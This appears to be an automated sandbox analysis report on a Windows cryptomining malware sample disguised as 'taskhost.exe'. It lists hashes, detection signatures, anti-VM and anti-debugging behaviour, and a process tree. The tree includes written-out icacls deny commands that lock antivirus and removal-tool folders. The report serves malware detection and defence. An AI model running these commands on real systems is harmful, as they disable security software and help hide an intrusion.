Overview
overview
10Static
static
10sss/Install/Del3.bat
windows7-x64
1sss/Install/Del3.bat
windows10-2004-x64
1sss/Instal...te.bat
windows7-x64
1sss/Instal...te.bat
windows10-2004-x64
1sss/Install/del.bat
windows7-x64
1sss/Install/del.bat
windows10-2004-x64
1sss/Install/smss.exe
windows7-x64
10sss/Install/smss.exe
windows10-2004-x64
10sss/RDPWinst.exe
windows7-x64
1sss/RDPWinst.exe
windows10-2004-x64
1sss/ReaIte...st.exe
windows7-x64
10sss/ReaIte...st.exe
windows10-2004-x64
10sss/ReaIte...tw.exe
windows7-x64
9sss/ReaIte...tw.exe
windows10-2004-x64
9sss/Window...rv.exe
windows7-x64
10sss/Window...rv.exe
windows10-2004-x64
10sss/Window...MD.exe
windows7-x64
1sss/Window...MD.exe
windows10-2004-x64
1sss/Window...le.exe
windows7-x64
1sss/Window...le.exe
windows10-2004-x64
1sss/Window...st.exe
windows7-x64
1sss/Window...st.exe
windows10-2004-x64
1sss/Window...64.sys
windows7-x64
1sss/Window...64.sys
windows10-2004-x64
1sss/Window...dg.exe
windows7-x64
9sss/Window...dg.exe
windows10-2004-x64
9sss/Window...on.bat
windows7-x64
1sss/Window...on.bat
windows10-2004-x64
1Analysis
-
max time kernel
1052s -
max time network
1068s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30-03-2024 23:04
Behavioral task
behavioral1
Sample
sss/Install/Del3.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
sss/Install/Del3.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
sss/Install/Delete.bat
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
sss/Install/Delete.bat
Resource
win10v2004-20240319-en
Behavioral task
behavioral5
Sample
sss/Install/del.bat
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
sss/Install/del.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
sss/Install/smss.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
sss/Install/smss.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
sss/RDPWinst.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
sss/RDPWinst.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
sss/ReaItekHD/taskhost.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
sss/ReaItekHD/taskhost.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
sss/ReaItekHD/taskhostw.exe
Resource
win7-20231129-en
Behavioral task
behavioral14
Sample
sss/ReaItekHD/taskhostw.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
sss/Windows Tasks Service/winserv.exe
Resource
win7-20240215-en
Behavioral task
behavioral16
Sample
sss/Windows Tasks Service/winserv.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
sss/WindowsTask/AMD.exe
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
sss/WindowsTask/AMD.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
sss/WindowsTask/AppModule.exe
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
sss/WindowsTask/AppModule.exe
Resource
win10v2004-20240319-en
Behavioral task
behavioral21
Sample
sss/WindowsTask/MicrosoftHost.exe
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
sss/WindowsTask/MicrosoftHost.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
sss/WindowsTask/WinRing0x64.sys
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
sss/WindowsTask/WinRing0x64.sys
Resource
win10v2004-20240226-en
Behavioral task
behavioral25
Sample
sss/WindowsTask/audiodg.exe
Resource
win7-20231129-en
Behavioral task
behavioral26
Sample
sss/WindowsTask/audiodg.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
sss/WindowsTask/winlogon.bat
Resource
win7-20240221-en
Behavioral task
behavioral28
Sample
sss/WindowsTask/winlogon.bat
Resource
win10v2004-20240226-en
General
-
Target
sss/ReaItekHD/taskhost.exe
-
Size
21.7MB
-
MD5
b2ceb39a1dc0ed07e6e91ebc1131e6af
-
SHA1
bd5d9ca87727af82c0109d8fdd44fcd090a4302a
-
SHA256
7f29a1005a7c5c936791c1f9b2a6745286a01467fb15c94beaaf72ac959aee1e
-
SHA512
c8deb6c184e58fb27f2d760c8740af5a62c4182824e9b48607eb810fa95896c8bcdbf8d50c117f06a620b8f35c3eaa59a9376f8b8b9d27ca17a2b2f2047adb07
-
SSDEEP
393216:h/f16H6QzwnoD13bPmzcAWOzOutBzA6YG7E3VHEx8OdM8E4BQ4vqd0TEX:hV4SoD13bPmzcAWUA6rE3VHEx86MgKYQ
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhost.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral11/files/0x0006000000018b33-30.dat family_xmrig behavioral11/files/0x0006000000018b33-30.dat xmrig -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ audiodg.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion audiodg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion audiodg.exe -
Executes dropped EXE 3 IoCs
pid Process 2480 Packs.exe 1752 audiodg.exe 520 MicrosoftHost.exe -
Loads dropped DLL 2 IoCs
pid Process 2220 taskhost.exe 2220 taskhost.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 2148 icacls.exe 2256 icacls.exe 2412 icacls.exe 1520 icacls.exe 1808 icacls.exe 1092 icacls.exe 440 icacls.exe 2792 icacls.exe 1612 icacls.exe 2468 icacls.exe 1900 icacls.exe 2256 icacls.exe 2656 icacls.exe 2492 icacls.exe 2864 icacls.exe 2448 icacls.exe 2688 icacls.exe 1636 icacls.exe 1612 icacls.exe 1656 icacls.exe 2448 icacls.exe 2844 icacls.exe 1492 icacls.exe 1728 icacls.exe 1808 icacls.exe 1768 icacls.exe 2908 icacls.exe 2320 icacls.exe 1764 icacls.exe 2828 icacls.exe 2452 icacls.exe 1532 icacls.exe 2312 icacls.exe 2504 icacls.exe 2820 icacls.exe 3032 icacls.exe 2644 icacls.exe 1516 icacls.exe 1832 icacls.exe 676 icacls.exe 2224 icacls.exe 2548 icacls.exe 2960 icacls.exe 1732 icacls.exe 2012 icacls.exe 2980 icacls.exe 1728 icacls.exe 1204 icacls.exe 2688 icacls.exe 2480 icacls.exe 1120 icacls.exe 3060 icacls.exe 676 icacls.exe 1120 icacls.exe 1636 icacls.exe 936 icacls.exe 1712 icacls.exe 2408 icacls.exe 1536 icacls.exe 2860 icacls.exe 2828 icacls.exe 2596 icacls.exe 1204 icacls.exe 2092 icacls.exe -
resource yara_rule behavioral11/memory/2220-0-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-2-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-3-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-4-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-5-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-6-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-7-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-8-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-9-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-10-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/files/0x0008000000018ae8-31.dat themida behavioral11/memory/2220-33-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-37-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-39-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-40-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-41-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-42-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-43-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/2220-44-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-48-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-53-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-54-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-55-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-56-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-57-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-58-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-59-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-60-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-61-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-64-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/1752-70-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-71-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-73-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-74-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-76-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-80-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-81-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-82-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-83-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-84-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-85-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-86-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-87-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-88-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-89-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-90-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-91-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-92-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-93-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-94-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-95-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-96-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-97-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-98-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-99-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-100-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-101-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-102-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-103-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-104-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-105-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-106-0x000000013F630000-0x0000000141477000-memory.dmp themida behavioral11/memory/1752-107-0x000000013F710000-0x00000001408A4000-memory.dmp themida behavioral11/memory/2220-108-0x000000013F630000-0x0000000141477000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA audiodg.exe -
AutoIT Executable 63 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral11/memory/2220-3-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-4-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-5-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-6-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-7-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-8-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-9-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-10-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-33-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-37-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-39-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-40-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-41-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-42-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-43-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/2220-44-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-54-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/1752-55-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/1752-56-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/1752-57-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/1752-58-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/1752-59-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/1752-60-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-61-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-64-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/1752-70-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-71-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-73-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-74-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-76-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-80-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-81-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-82-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-83-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-84-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-85-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-86-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-87-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-88-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-89-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-90-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-91-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-92-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-93-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-94-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-95-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-96-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-97-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-98-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-99-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-100-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-101-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-102-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-103-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-104-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-105-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-106-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-107-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-108-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-109-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-110-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe behavioral11/memory/1752-111-0x000000013F710000-0x00000001408A4000-memory.dmp autoit_exe behavioral11/memory/2220-112-0x000000013F630000-0x0000000141477000-memory.dmp autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2220 taskhost.exe 1752 audiodg.exe -
Drops file in Program Files directory 38 IoCs
description ioc Process File opened for modification C:\Program Files\AVAST Software taskhost.exe File opened for modification C:\Program Files\SUPERAntiSpyware taskhost.exe File opened for modification C:\Program Files (x86)\AVAST Software taskhost.exe File opened for modification C:\Program Files\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab taskhost.exe File opened for modification C:\Program Files (x86)\Moo0 taskhost.exe File opened for modification C:\Program Files (x86)\SpyHunter taskhost.exe File opened for modification C:\Program Files\DrWeb taskhost.exe File opened for modification C:\Program Files\Common Files\AV taskhost.exe File opened for modification C:\Program Files\ESET taskhost.exe File opened for modification C:\Program Files\Transmission taskhost.exe File opened for modification C:\Program Files\EnigmaSoft taskhost.exe File opened for modification C:\Program Files\Malwarebytes taskhost.exe File opened for modification C:\Program Files\Enigma Software Group taskhost.exe File opened for modification C:\Program Files\AVG taskhost.exe File opened for modification C:\Program Files\HitmanPro taskhost.exe File opened for modification C:\Program Files\Rainmeter taskhost.exe File opened for modification C:\Program Files (x86)\IObit\IObit Malware Fighter taskhost.exe File opened for modification C:\Program Files\Common Files\Doctor Web taskhost.exe File opened for modification C:\Program Files (x86)\Transmission taskhost.exe File opened for modification C:\Program Files (x86)\SpeedFan taskhost.exe File opened for modification C:\Program Files\COMODO taskhost.exe File opened for modification C:\Program Files\Loaris Trojan Remover taskhost.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus taskhost.exe File opened for modification C:\Program Files (x86)\IObit taskhost.exe File opened for modification C:\Program Files (x86)\IObit\Advanced SystemCare taskhost.exe File opened for modification C:\Program Files (x86)\360 taskhost.exe File opened for modification C:\Program Files\SpyHunter taskhost.exe File opened for modification C:\Program Files (x86)\AVG taskhost.exe File opened for modification C:\Program Files\Cezurity taskhost.exe File opened for modification C:\Program Files\Process Lasso taskhost.exe File opened for modification C:\Program Files (x86)\Panda Security taskhost.exe File opened for modification C:\Program Files\Bitdefender Agent taskhost.exe File opened for modification C:\Program Files (x86)\Cezurity taskhost.exe File opened for modification C:\Program Files\Common Files\McAfee taskhost.exe File opened for modification C:\Program Files\Ravantivirus taskhost.exe File opened for modification C:\Program Files\Process Hacker 2 taskhost.exe File opened for modification C:\Program Files\RogueKiller taskhost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 audiodg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString audiodg.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2912 ipconfig.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\winmgmts:\localhost\root\CIMV2 taskhost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe 2220 taskhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2220 taskhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 520 MicrosoftHost.exe Token: SeLockMemoryPrivilege 520 MicrosoftHost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 520 MicrosoftHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2220 wrote to memory of 3000 2220 taskhost.exe 31 PID 2220 wrote to memory of 3000 2220 taskhost.exe 31 PID 2220 wrote to memory of 3000 2220 taskhost.exe 31 PID 3000 wrote to memory of 2912 3000 cmd.exe 33 PID 3000 wrote to memory of 2912 3000 cmd.exe 33 PID 3000 wrote to memory of 2912 3000 cmd.exe 33 PID 2220 wrote to memory of 2948 2220 taskhost.exe 34 PID 2220 wrote to memory of 2948 2220 taskhost.exe 34 PID 2220 wrote to memory of 2948 2220 taskhost.exe 34 PID 2948 wrote to memory of 2520 2948 cmd.exe 36 PID 2948 wrote to memory of 2520 2948 cmd.exe 36 PID 2948 wrote to memory of 2520 2948 cmd.exe 36 PID 2220 wrote to memory of 2480 2220 taskhost.exe 144 PID 2220 wrote to memory of 2480 2220 taskhost.exe 144 PID 2220 wrote to memory of 2480 2220 taskhost.exe 144 PID 2220 wrote to memory of 2480 2220 taskhost.exe 144 PID 2220 wrote to memory of 2428 2220 taskhost.exe 40 PID 2220 wrote to memory of 2428 2220 taskhost.exe 40 PID 2220 wrote to memory of 2428 2220 taskhost.exe 40 PID 2220 wrote to memory of 1240 2220 taskhost.exe 42 PID 2220 wrote to memory of 1240 2220 taskhost.exe 42 PID 2220 wrote to memory of 1240 2220 taskhost.exe 42 PID 1240 wrote to memory of 1668 1240 cmd.exe 158 PID 1240 wrote to memory of 1668 1240 cmd.exe 158 PID 1240 wrote to memory of 1668 1240 cmd.exe 158 PID 2220 wrote to memory of 1908 2220 taskhost.exe 161 PID 2220 wrote to memory of 1908 2220 taskhost.exe 161 PID 2220 wrote to memory of 1908 2220 taskhost.exe 161 PID 2220 wrote to memory of 1108 2220 taskhost.exe 164 PID 2220 wrote to memory of 1108 2220 taskhost.exe 164 PID 2220 wrote to memory of 1108 2220 taskhost.exe 164 PID 1108 wrote to memory of 1520 1108 cmd.exe 49 PID 1108 wrote to memory of 1520 1108 cmd.exe 49 PID 1108 wrote to memory of 1520 1108 cmd.exe 49 PID 2220 wrote to memory of 1432 2220 taskhost.exe 50 PID 2220 wrote to memory of 1432 2220 taskhost.exe 50 PID 2220 wrote to memory of 1432 2220 taskhost.exe 50 PID 2220 wrote to memory of 1916 2220 taskhost.exe 52 PID 2220 wrote to memory of 1916 2220 taskhost.exe 52 PID 2220 wrote to memory of 1916 2220 taskhost.exe 52 PID 1916 wrote to memory of 1712 1916 cmd.exe 54 PID 1916 wrote to memory of 1712 1916 cmd.exe 54 PID 1916 wrote to memory of 1712 1916 cmd.exe 54 PID 2220 wrote to memory of 944 2220 taskhost.exe 55 PID 2220 wrote to memory of 944 2220 taskhost.exe 55 PID 2220 wrote to memory of 944 2220 taskhost.exe 55 PID 944 wrote to memory of 1532 944 cmd.exe 173 PID 944 wrote to memory of 1532 944 cmd.exe 173 PID 944 wrote to memory of 1532 944 cmd.exe 173 PID 2220 wrote to memory of 1640 2220 taskhost.exe 58 PID 2220 wrote to memory of 1640 2220 taskhost.exe 58 PID 2220 wrote to memory of 1640 2220 taskhost.exe 58 PID 1640 wrote to memory of 1656 1640 cmd.exe 176 PID 1640 wrote to memory of 1656 1640 cmd.exe 176 PID 1640 wrote to memory of 1656 1640 cmd.exe 176 PID 2220 wrote to memory of 1340 2220 taskhost.exe 181 PID 2220 wrote to memory of 1340 2220 taskhost.exe 181 PID 2220 wrote to memory of 1340 2220 taskhost.exe 181 PID 1340 wrote to memory of 1492 1340 cmd.exe 180 PID 1340 wrote to memory of 1492 1340 cmd.exe 180 PID 1340 wrote to memory of 1492 1340 cmd.exe 180 PID 2220 wrote to memory of 828 2220 taskhost.exe 184 PID 2220 wrote to memory of 828 2220 taskhost.exe 184 PID 2220 wrote to memory of 828 2220 taskhost.exe 184
Processes
-
C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\taskhost.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:2912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force2⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\gpupdate.exegpupdate /force3⤵PID:2520
-
-
-
C:\ProgramData\Setup\Packs.exeC:\ProgramData\Setup\Packs.exe -ppidar2⤵
- Executes dropped EXE
PID:2480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)2⤵PID:2428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵PID:1668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)2⤵PID:1908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)2⤵PID:1432
-
-
